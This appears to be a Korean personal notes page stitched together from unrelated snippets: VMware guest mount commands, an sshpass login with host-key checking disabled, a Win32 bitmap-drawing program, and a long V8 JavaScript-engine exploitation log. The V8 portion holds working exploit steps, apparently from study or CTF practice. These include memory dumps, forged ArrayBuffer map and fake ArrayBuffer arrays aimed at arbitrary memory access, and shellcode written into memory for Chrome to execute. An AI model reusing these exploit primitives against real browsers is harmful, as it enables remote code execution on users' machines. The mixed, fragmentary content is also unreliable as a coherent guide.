Most other answers are outdated. For Ubuntu 18.04 (or recent Debian-based distros), try:

sudo vmhgfs-fuse .host:/ /mnt/hgfs/ -o allow_other -o uid=1000

Note that allow_other lets every local account on the guest read the host shares through this mount (uid=1000 only controls which user the files appear to belong to); leave it out if only one user should have access.

If the hgfs directory doesn't exist, try:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

You may have to use a specific share instead of .host:/. In that case you can list the share names with vmware-hgfsclient. For example:

$ vmware-hgfsclient
my-shared-folder
$ sudo vmhgfs-fuse .host:/my-shared-folder /mnt/hgfs/ -o allow_other -o uid=1000

If you want them mounted on startup, update /etc/fstab with the following:

# Use shared folders between VMWare guest and host
.host:/ /mnt/hgfs/ fuse.vmhgfs-fuse defaults,allow_other,uid=1000 0 0

(The comment has to be on its own line: if it shares a line with the entry, the whole line is a comment and nothing is mounted.)

I chose to mount them on demand and have them ignored by `sudo mount -a` and the like by adding the noauto option, because I noticed the shares have an impact on VM performance.

Requirements

You may need to install the following tools beforehand:

sudo apt-get install open-vm-tools open-vm-tools-desktop

Others have claimed the following are required:

sudo apt-get install build-essential module-assistant \
    linux-headers-virtual linux-image-virtual && sudo dpkg-reconfigure open-vm-tools


sshpass 사용


sshpass -p 'password' ssh -o StrictHostKeyChecking=no user_id@IP

Two caveats before using this anywhere but a throwaway lab: `-p` puts the password on the command line, where every local user can read it from the process list and where the shell history keeps it — prefer `sshpass -e` (password taken from the SSHPASS environment variable) or `sshpass -f <file>`. `StrictHostKeyChecking=no` also accepts an unknown or changed host key silently, so a man-in-the-middle is never noticed; use `-o StrictHostKeyChecking=accept-new` (OpenSSH 7.6+) or pre-populate known_hosts instead.


sudo vi /etc/apt/sources.list

 

: 콜론 입력

%s/kr.archive.ubuntu.com/ftp.daumkakao.com

 


ssh 설치


그래야 편하게 사용하니까


파일을 읽어서 이미지에 넣고 그린다

```cpp

#include <windows.h>

#include <cstring>
#include <fstream>
#include <vector>

using namespace std;

/* This is where all the input to the window goes to */
LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
    /* Only window teardown is handled here; every other message is passed on
     * to the default window procedure. */
    if (Message == WM_DESTROY) {
        PostQuitMessage(0); /* makes GetMessage in WinMain return 0, ending the loop */
        return 0;
    }
    return DefWindowProc(hwnd, Message, wParam, lParam);
}

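/* Read the whole of `path` into `out`.
 * Returns false (with `out` empty) if the file cannot be opened, has no
 * size, or is not read completely. */
static bool ReadWholeFile(const char* path, std::vector<char>& out) {
    out.clear();
    std::ifstream is(path, std::ios::binary);
    if (!is) {
        return false;
    }
    is.seekg(0, std::ios::end);
    const std::streamoff size = is.tellg();
    if (size <= 0) {
        return false; /* tellg() yields -1 on failure */
    }
    is.seekg(0, std::ios::beg);
    out.resize(static_cast<size_t>(size));
    is.read(out.data(), size);
    if (is.gcount() != size) { /* short read: never parse a half-filled buffer */
        out.clear();
        return false;
    }
    return true;
}

/* Build a DIB section from the raw bytes of a .bmp file.
 * The file is untrusted input, so every offset and size taken from it is
 * checked against the buffer before it is used. Only BITMAPINFOHEADER-style
 * files with uncompressed (BI_RGB / BI_BITFIELDS) pixel data are accepted.
 * Returns NULL when the bytes are not such a bitmap or GDI refuses it. */
static HBITMAP CreateDibFromBmpBytes(const std::vector<char>& file) {
    BITMAPFILEHEADER bfh;
    BITMAPINFOHEADER bih;
    if (file.size() < sizeof(bfh) + sizeof(bih)) {
        return NULL;
    }
    /* memcpy instead of a pointer cast: the headers are packed structs and the
     * buffer carries no alignment guarantee. */
    memcpy(&bfh, file.data(), sizeof(bfh));
    memcpy(&bih, file.data() + sizeof(bfh), sizeof(bih));

    if (bfh.bfType != 0x4D42 /* "BM" */ || bih.biSize != sizeof(bih)) {
        return NULL;
    }
    const size_t paletteOffset = sizeof(bfh) + bih.biSize;
    if (bfh.bfOffBits < paletteOffset || bfh.bfOffBits > file.size()) {
        return NULL;
    }
    if (bih.biWidth <= 0 || bih.biHeight == 0) {
        return NULL;
    }
    switch (bih.biBitCount) {
        case 1: case 4: case 8: case 16: case 24: case 32:
            break;
        default:
            return NULL;
    }
    if (bih.biCompression != BI_RGB && bih.biCompression != BI_BITFIELDS) {
        return NULL; /* RLE data is not stride*height bytes; not handled here */
    }

    /* Colour table: <=8 bpp files carry 2^bpp (or biClrUsed) RGBQUAD entries,
     * BI_BITFIELDS carries three DWORD masks, everything else carries none. */
    size_t colorBytes = 0;
    if (bih.biBitCount <= 8) {
        const DWORD colors = bih.biClrUsed ? bih.biClrUsed : (1u << bih.biBitCount);
        if (colors > 256) {
            return NULL;
        }
        colorBytes = colors * sizeof(RGBQUAD);
    } else if (bih.biCompression == BI_BITFIELDS) {
        colorBytes = 3 * sizeof(DWORD);
    }
    if (colorBytes > bfh.bfOffBits - paletteOffset) {
        return NULL; /* colour table would overlap the pixel data */
    }

    /* Pixel rows are DWORD-aligned; compute in 64 bits so hostile width/bpp
     * values cannot overflow the size check. */
    long long height = bih.biHeight;
    if (height < 0) {
        height = -height; /* negative height = top-down bitmap */
    }
    const unsigned long long stride =
        ((static_cast<unsigned long long>(bih.biWidth) * bih.biBitCount + 31) / 32) * 4;
    const unsigned long long pixelBytes = stride * static_cast<unsigned long long>(height);
    if (pixelBytes > file.size() - bfh.bfOffBits) {
        return NULL;
    }

    /* BITMAPINFO only declares room for one RGBQUAD, so allocate the real size
     * instead of letting GDI read past a stack object. */
    std::vector<unsigned char> infoBuf(sizeof(BITMAPINFOHEADER) + colorBytes);
    BITMAPINFO* bi = reinterpret_cast<BITMAPINFO*>(infoBuf.data());
    memcpy(&bi->bmiHeader, &bih, sizeof(bih));
    if (colorBytes != 0) {
        memcpy(bi->bmiColors, file.data() + paletteOffset, colorBytes);
    }

    void* bits = NULL;
    HBITMAP hBitmap = CreateDIBSection(NULL, bi, DIB_RGB_COLORS, &bits, NULL, 0);
    if (hBitmap == NULL) {
        return NULL;
    }
    if (SetDIBits(NULL, hBitmap, 0, static_cast<UINT>(height),
                  file.data() + bfh.bfOffBits, bi, DIB_RGB_COLORS) == 0) {
        DeleteObject(hBitmap);
        return NULL;
    }
    return hBitmap;
}

/* The 'main' function of Win32 GUI programs: this is where execution starts.
 * Registers a window class, creates the window, draws a.bmp into it once and
 * then runs the message loop until WM_QUIT. */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    WNDCLASSEX wc; /* properties of our window class */
    HWND hwnd;     /* a 'HANDLE', hence the H, to our window */
    MSG msg;       /* scratch location for the message loop */

    /* zero out the struct and set the stuff we want to modify */
    memset(&wc, 0, sizeof(wc));
    wc.cbSize        = sizeof(WNDCLASSEX);
    wc.lpfnWndProc   = WndProc; /* This is where we will send messages to */
    wc.hInstance     = hInstance;
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
    /* White; COLOR_WINDOW is just a #define for a system colour */
    wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
    wc.lpszClassName = "WindowClass";
    wc.hIcon         = LoadIcon(NULL, IDI_APPLICATION); /* Load a standard icon */
    wc.hIconSm       = LoadIcon(NULL, IDI_APPLICATION); /* use the name "A" to use the project icon */

    if (!RegisterClassEx(&wc)) {
        MessageBox(NULL, "Window Registration Failed!", "Error!", MB_ICONEXCLAMATION | MB_OK);
        return 0;
    }
    hwnd = CreateWindowEx(WS_EX_CLIENTEDGE, "WindowClass", "Fake Virus for Pentest",
                          WS_VISIBLE | WS_OVERLAPPEDWINDOW,
                          CW_USEDEFAULT, /* x */
                          CW_USEDEFAULT, /* y */
                          640,           /* width */
                          480,           /* height */
                          NULL, NULL, hInstance, NULL);
    if (hwnd == NULL) {
        MessageBox(NULL, "Window Creation Failed!", "Error!", MB_ICONEXCLAMATION | MB_OK);
        return 0;
    }

    /* a.bmp is resolved against the current working directory, so whoever
     * controls the CWD controls what is parsed; a missing or malformed file
     * now just leaves the window blank instead of reading out of bounds. */
    std::vector<char> fileBytes;
    HBITMAP hBitmap = NULL;
    if (ReadWholeFile("a.bmp", fileBytes)) {
        hBitmap = CreateDibFromBmpBytes(fileBytes);
    }

    if (hBitmap != NULL) {
        BITMAP bmp;
        GetObject(hBitmap, sizeof(bmp), &bmp); /* width/height of the loaded image */

        HDC bmpDC = CreateCompatibleDC(NULL);  /* holds the bitmap for BitBlt */
        HDC hDC = GetDC(hwnd);
        HGDIOBJ previous = SelectObject(bmpDC, hBitmap);
        BitBlt(hDC, 0, 0, bmp.bmWidth, bmp.bmHeight, bmpDC, 0, 0, SRCCOPY);
        SelectObject(bmpDC, previous); /* deselect before the bitmap is deleted */
        ReleaseDC(hwnd, hDC);

        DeleteDC(bmpDC);
        DeleteObject(hBitmap);
    }
    /* NOTE: the image is drawn once here rather than from a WM_PAINT handler
     * (WndProc has none), so any repaint of the window clears it. */

    /*
        This is the heart of our program where all input is processed and
        sent to WndProc. GetMessage blocks until something arrives, so this
        loop does not spin the CPU.
    */
    while (GetMessage(&msg, NULL, 0, 0) > 0) { /* returns -1 on error, 0 on WM_QUIT */
        TranslateMessage(&msg); /* Translate key codes to chars if present */
        DispatchMessage(&msg);  /* Send it to WndProc */
    }
    return static_cast<int>(msg.wParam);
}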
```


v8에서 정수는 *2한 짝수로 변환되고 주소는 +1한 홀수를 사용한다

그러므로 정수를 이용한 주소값 ****을 할 수 없다

현재 map을 정상적으로 만들지 못해서 큰일이다

 

gef➤  x/16wx 0x38a08194
0x38a08194: 0x22684ba9 0x35e04125 0x38a07f91 0x00000014
0x38a081a4: 0x23785021 0x33618ee5 0x22684c2d 0x35e04125
0x38a081b4: 0x38a081bd 0x00000014 0x23784185 0x00000014
0x38a081c4: 0x336197fd 0x3361980d 0x3361981d 0x3361982d
gef➤  x/16wx 0x22684ba8
0x22684ba8: 0x2378412d 0x17000004 0x000100c2 0x092007ff
0x22684bb8: 0x33607785 0x336075a9 0x3360794d 0x33607969
0x22684bc8: 0x35e04125 0x35e04125 0x33607985 0x2378412d
0x22684bd8: 0x17000004 0x000500c2 0x082083ff 0x33605171

gef➤  x/16wx 0x38a07f90
0x38a07f90: 0x2378433d 0x00000014 0x00000002 0x00000004
0x38a07fa0: 0x00000006 0x00000008 0x0000000a 0x0000000c
0x38a07fb0: 0x0000000e 0x00000010 0x00000012 0x00000014
0x38a07fc0: 0x237843c1 0x00000003 0x000000cc 0x5f415343

gef➤  x/32wx 0x2378433c
0x2378433c: 0x2378412d 0x06000000 0x001900a9 0x082003ff
0x2378434c: 0x35e04101 0x35e04101 0x00000000 0x35e0411d

gef➤  x/16w 0x35e04100
0x35e04100: 0x23784159 0x00000000 0x00000000 0x35e0412d
0x35e04110: 0x00000000 0x35e0413d 0x00000006 0x23784185
0x35e04120: 0x00000000 0x23784185 0x00000000 0x237841b1
0x35e04130: 0x3043247e 0x00000008 0x6c6c756e 0x237841b1
gef➤  x/16wx 0x23784158
0x23784158: 0x2378412d 0x33000007 0x00001083 0x002003ff
0x23784168: 0x35e04101 0x35e04101 0x00000000 0x35e0411d
0x23784178: 0x35e04125 0x35e04125 0x00000000 0x2378412d
0x23784188: 0x06000000 0x001800a9 0x002003ff 0x35e04101


gef➤  c
Continuing.
[object ArrayBuffer]
DebugPrint: 0x2790818d: [JSArrayBuffer]
 - map = 0x474865c9 [FastProperties]
 - prototype = 0x4b28f2d1
 - elements = 0x5cc04125 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
 - internal fields: 2
 - backing_store = 0x565f07a0
 - byte_length = 12
 - properties = {
 }
 - internal fields = {
    0
    0
 }
0x474865c9: [Map]
 - type: JS_ARRAY_BUFFER_TYPE
 - instance size: 32
 - inobject properties: 0
 - elements kind: FAST_HOLEY_SMI_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x5cc041a1 
 - instance descriptors (own) #0: 0x5cc0411d <FixedArray[0]>
 - prototype: 0x4b28f2d1 
 - constructor: 0x4b28f299 
 - code cache: 0x5cc04125 <FixedArray[0]>
 - dependent code: 0x5cc04125 <FixedArray[0]>
 - construction counter: 0

 

gef➤  x/32wx 0x2790818c
0x2790818c: 0x474865c9 0x5cc04125 0x5cc04125 0x00000018
0x2790819c: 0x565f07a0 0x00000004 0x00000000 0x00000000
0x279081ac: 0x474864c1 0x5cc04125 0x5cc04125 0x2790818d
0x279081bc: 0x00000000 0x00000018 0x00000000 0x00000000
0x279081cc: 0x48e84839 0x00000003 0x00000026 0x5cc42459
0x279081dc: 0x5cc4e669 0x48e84839 0x00000003 0x00000028
0x279081ec: 0x279081cd 0x5cc06995 0xdeadbeef 0xdeadbeef
0x279081fc: 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef
gef➤  x/32wx 0x474865c8
0x474865c8: 0x48e8412d 0x3d000008 0x000900c3 0x082003ff
0x474865d8: 0x4b28f2d1 0x4b28f299 0x00000000 0x5cc0411d
0x474865e8: 0x5cc04125 0x5cc04125 0x00000000 0x48e8412d
0x474865f8: 0x1a000407 0x031d00bc 0x082013ff 0x4b285171
0x47486608: 0x4b28518d 0x00000000 0x4b28f2ed 0x5cc04125
0x47486618: 0x5cc04125 0x00000000 0x48e8412d 0x1d00000a
0x47486628: 0x007100c4 0x082003ff 0x4b28f48d 0x4b28f455
0x47486638: 0x00000000 0x5cc0411d 0x5cc04125 0x5cc04125
gef➤  x/32wx 0x5cc04124
0x5cc04124: 0x48e84185 0x00000000 0x48e841b1 0x3043247e
0x5cc04134: 0x00000008 0x6c6c756e 0x48e841b1 0xae4b45da
0x5cc04144: 0x0000000c 0x656a626f 0xdead7463 0x48e84235
0x5cc04154: 0x00000000 0xbff00000 0x5cc0416d 0xfffffffe
0x5cc04164: 0x5cc04189 0x0000000c 0x48e841b1 0xe697d962
0x5cc04174: 0x0000001a 0x6e696e75 0x61697469 0x657a696c
0x5cc04184: 0xdeadbe64 0x48e841b1 0x21a3306e 0x00000012
0x5cc04194: 0x65646e75 0x656e6966 0xdeadbe64 0x48e84261
gef➤  x/32wx 0x48e84184
0x48e84184: 0x48e8412d 0x06000000 0x001800a9 0x002003ff
0x48e84194: 0x5cc04101 0x5cc04101 0x00000000 0x5cc0411d
0x48e841a4: 0x5cc04125 0x5cc04125 0x00000000 0x48e8412d
0x48e841b4: 0x00007700 0x00190004 0x082003ff 0x5cc04101
0x48e841c4: 0x5cc04101 0x00000000 0x5cc0411d 0x5cc04125
0x48e841d4: 0x5cc04125 0x00000000 0x48e8412d 0x14000001
0x48e841e4: 0x00190095 0x082003ff 0x5cc04101 0x5cc04101
0x48e841f4: 0x00000000 0x5cc0411d 0x5cc04125 0x5cc04125

 

root@ubuntu1804:~/hack/hack/docker/ubuntu1804/hack/v8/v8/out.gn/ia32.debug# ./d8 --allow_natives_syntax 1.js
[-] 22.ab2_map_obj_addr: 0x52cd5b21
[-] 3.fake_ab_float_addr: 0x52ce9441
debug
fp = 0xffffcc04, sp = 0xffffcbc8, caller_sp = 0xffffcc0c: #
0x52ce9441: [JSArrayBuffer]
 - map = 0x52cc1ee9 [FastProperties]
 - prototype = 0x3fb8f2d1
 - elements = 0x52cd5b21 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
 - internal fields: 2
 - backing_store = 0x12345678
 - byte_length = 8192
 - properties = {
 }
 - internal fields = {
    0
    0
 }

1.js:195: TypeError: First argument to DataView constructor must be an ArrayBuffer
fake_dv = new DataView(fake_arraybuffer,1,0x2000);
           ^
TypeError: First argument to DataView constructor must be an ArrayBuffer
    at new DataView ()
    at 1.js:195:12

 

 


[64bit 코드]        

        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]

[32bit 코드]

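        var nop = 0xdaba0000;
        // 32-bit layout (compare the x/32wx dumps of the map objects below).
        // The commas after 0x3d000008 and 0x000900c3 were missing, which made
        // the literal a syntax error.
        var ab_map_obj = [
                nop, 0x3d000008, 0x000900c3, 0x082003ff,
                nop, nop,   // use ut32.prototype replace it
                0x0, nop
        ]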

 

[안되는 코드]

gef➤  x/32wx 0x4eba2fe0
0x4eba2fe0: 0x3c4d4fd1 0x3c4d4fd1 0x3c4d4fd1 0x00004000
0x4eba2ff0: 0x12345678 0x00000004 0x00000000 0x00000000
0x4eba3000: 0x9999999a 0x3ff19999 0x9999999a 0x3ff19999

gef➤  x/32wx 0x3c4d4fd0
0x3c4d4fd0: 0xdaba0000 0x3d000008 0x000900c3 0x082003ff
0x3c4d4fe0: 0x3608f2d1 0x3608f299 0x00000000 0x00000000
0x3c4d4ff0: 0x9999999a 0x3ff19999 0x9999999a 0x3ff19999

[정상]

gef➤  x/32wx 0x4150818c
0x4150818c: 0x43f065c9 0x4c684125 0x4c684125 0x00000018
0x4150819c: 0x565f07a0 0x00000004 0x00000000 0x00000000
0x415081ac: 0x43f064c1 0x4c684125 0x4c684125 0x4150818d
gef➤  x/32wx 0x43f065c8
0x43f065c8: 0x5f28412d 0x3d000008 0x000900c3 0x082003ff
0x43f065d8: 0x3ed0f2d1 0x3ed0f299 0x00000000 0x4c68411d
0x43f065e8: 0x4c684125 0x4c684125 0x00000000 0x5f28412d

 

 

[디버깅용 코드]

// d8 script used to locate a JSArrayBuffer in memory. %DebugPrint needs
// `d8 --allow_natives_syntax`; print() is the d8 builtin.
var buffer = new ArrayBuffer(12);   // shows up as byte_length = 12 in the DebugPrint output above
var dataView = new DataView(buffer);
print(buffer);                      // prints "[object ArrayBuffer]"
%DebugPrint(buffer);                // dumps the object and its map (see the gef session above)
print("ok");

 

gef➤  b *fprintf
Breakpoint 1 at 0xf5f4d2b0
gef➤  r --allow_natives_syntax test.js

 

 

 

 

 


[.] 1.ab_prot_addr: 0xaedb4791b49

gef➤  x/32gx 0xaedb4791b48-0x70
0xaedb4791ad8: 0x00000f52d2183179 0x00000aedb4791b21
0xaedb4791ae8: 0x00000c3bb5c02241 0x00000f52d2185fe1
0xaedb4791af8: 0x00000c3bb5c68ae9 0x00000aedb4783bf9
0xaedb4791b08: 0x00000c3bb5c04cf9 0x00000196d55d2200
0xaedb4791b18: 0x00000c3bb5c02311 0x00003b553b682309
0xaedb4791b28: 0x0000000300000000 0x0000000800000000
0xaedb4791b38: 0x00000c3bb5c02311 0x00000c3bb5c02311
0xaedb4791b48: 0x00000f52d2186039 0x00000c3bb5c02241
0xaedb4791b58: 0x00000c3bb5c02241 0x00000b29b95a39c9
0xaedb4791b68: 0x0000000000000000 0x0000000000000000


[.] 2.u2d(ab_map_obj_float[0x3]): 0xaedb4791b49


[.] 3.ab_map_obj_addr: 0x16929c50a621

gef➤  x/32gx 0x16929c50a620-0x40
0x16929c50a5e0: 0x00000f52d2183c79 0x00000c3bb5c02241
0x16929c50a5f0: 0x000016929c50a611 0x0000000600000000
0x16929c50a600: 0x00003b553b683f91 0x00000aedb47c9eb1
0x16929c50a610: 0x00003b553b682e09 0x0000000600000000
0x16929c50a620: 0xdaba0000daba0000 0x000900c01f000008
0x16929c50a630: 0x00000000082003ff 0x00000aedb4791b49      ; ab_proto_addr = read_obj_addr(ab.__proto__);
0x16929c50a640: 0x00000aedb4791ad9 0x0000000000000000   ; ab_constructor_addr = ab_proto_addr - 0x70;
0x16929c50a650: 0x00003b553b682519 0x41eb574000000000
0x16929c50a660: 0x00003b553b682519 0x41eb574000000000

[참조]

gef➤  x/20gx 0x0000358452d8ba80
0x358452d8ba80: 0x000023b229484569 0x0000125339f82241      ; 디버깅을 해보면 다른 값이 출력되나 첫번째 값으로 해도 ok
0x358452d8ba90: 0x0000125339f82241 0x0000358452d8ba41      ; 단, 다른 값을 사용하면 --allow_natives_syntax 는 꽥임
0x358452d8baa0: 0x0000000000000000 0x0000000c00000000
0x358452d8bab0: 0x0000000000000000 0x0000000000000000
0x358452d8bac0: 0x00000e2a9ea831d1 0x0000000000000003

 

gef➤  x/32gx 0x000023b229484568
0x23b229484568: 0x00000e2a9ea82259 0x000900c21b000008 ; 정상적으로 디버깅 한 값과 같음
0x23b229484578: 0x00000000082003ff 0x00001b050c00b471 ; ab .value
0x23b229484588: 0x00001b050c00b401 0x0000000000000000

 

 

        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]
        ab_proto_addr = read_obj_addr(ab.__proto__);
        ab_constructor_addr = ab_proto_addr - 0x70;
        //alert(ab_proto_addr.toString(16));
        ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
        ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
        ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
        ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
        float_arr = [];
        /*for(var i = 0;i < 0x100;i++){
                float_arr[i] = [1.1,1.1,1.1,1.1,1.1,1.1];
        }*/
        gc();
        var ab_map_obj_float = [1.1, 1.1, 1.1, 1.1, 1.1, 1.1];  //6개
        change_to_float(ab_map_obj,ab_map_obj_float);


[.] 4.fake_ab_float_addr: 0x16929c56d571

➤  x/32gx 0x16929c56d570-0x40
0x16929c56d530: 0x00000f52d2183c79 0x00000c3bb5c02241
0x16929c56d540: 0x000016929c56d561 0x0000000600000000
0x16929c56d550: 0x00003b553b683f91 0x00000aedb47d0091
0x16929c56d560: 0x00003b553b682e09 0x0000000600000000
0x16929c56d570: 0x000016929c50a621 0x000016929c50a621
0x16929c56d580: 0x000016929c50a621 0x0000400000000000      ; 버퍼길이
0x16929c56d590: 0x00000196d55e9ba0 0x0000000000000004
0x16929c56d5a0: 0x00003b553b682519 0x40b6929c50a62100
0x16929c56d5b0: 0x00003b553b682519 0xc1d8ebd677c00000

        var fake_ab = [
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                0x0,0x4000, /* buffer length */
                0x12345678,0x123,/* buffer address */
                0x4,0x0
        ]
        var fake_ab_float = [1.1,1.1,1.1,1.1,1.1,1.1];   //6개
        change_to_float(fake_ab,fake_ab_float);


[.] 5.fake_ab_float[4]: 0x12312345678

        fake_arraybuffer = double_arr42[1];
        fake_dv = new DataView(fake_arraybuffer,0,0x4000);

almost done!!


[.]shellcode_address_ref: 0x1f85944d4560
[.]shellcode_address_ref: 0x1f85944d4560

gef➤  x/32gx 0x1f85944d4560
0x1f85944d4560: 0x00000196d55e9ba0 0x00000c3bb5c02311
0x1f85944d4570: 0x00000f52d218ee31 0x00001f85944d45a1
0x1f85944d4580: 0x00001f85944d4961 0x0000000100000000
0x1f85944d4590: 0x00003b553b683f91 0x00000aedb47d8429
0x1f85944d45a0: 0x00003b553b682309 0x0000000300000000
0x1f85944d45b0: 0x0000000100000000 0x00000c3bb5c02311
0x1f85944d45c0: 0x00000c3bb5c02311 0x00003b553b682e09


[.]shellcode_address: 0x196d55e9ba0

gef➤  x/32gx 0x196d55e9ba0
0x196d55e9ba0: 0x90909090cccccccc 0x0f014f40f61f478b
0x196d55e9bb0: 0x708b4c000000c585 0x96d55e9b41b9483f
0x196d55e9bc0: 0x0f07483b48000001 0x4f8b48000000ba85


[.]shellcode write
[.]shellcode write
[*]go to shellcode plz,chrome!


 

 

http://eternalsakura13.com/2018/08/02/v8_debug/
